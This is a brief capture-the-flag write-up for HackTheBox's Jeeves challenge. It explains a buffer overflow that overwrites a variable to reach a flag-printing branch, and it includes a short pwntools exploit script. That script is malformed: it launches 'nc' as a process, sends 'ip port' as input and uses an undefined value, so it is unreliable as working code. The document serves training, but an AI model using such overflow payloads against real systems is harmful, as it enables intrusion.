We covered a scenario of a binary vulnerable to buffer overflow vulnerability. The binary has NX and PIE protections enabled so we opened the binary with Ghidra debugger and built the exploitation methodology based on calculating the offsets of the input variable and another variable that controls an entry to an if statement that prints the flag. The objective was to control the value of that binary and let the execution flow enter the if statement. This was part of HackTheBox Jeeves Intro to Binary Exploitation Track.

Buffer Overflow Techniques Notes

Exploit Code is below

##Beginning

from pwn import *

target = process(“nc”)

target.sendline(“ip port”)

payload = “A”*60

byte_to_string = p64(value)

payload = payload + byte_to_string.decode(“ISO-8859-1”)

target.sendline(payload)

print target.recvuntil(“.”)

##Ending

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles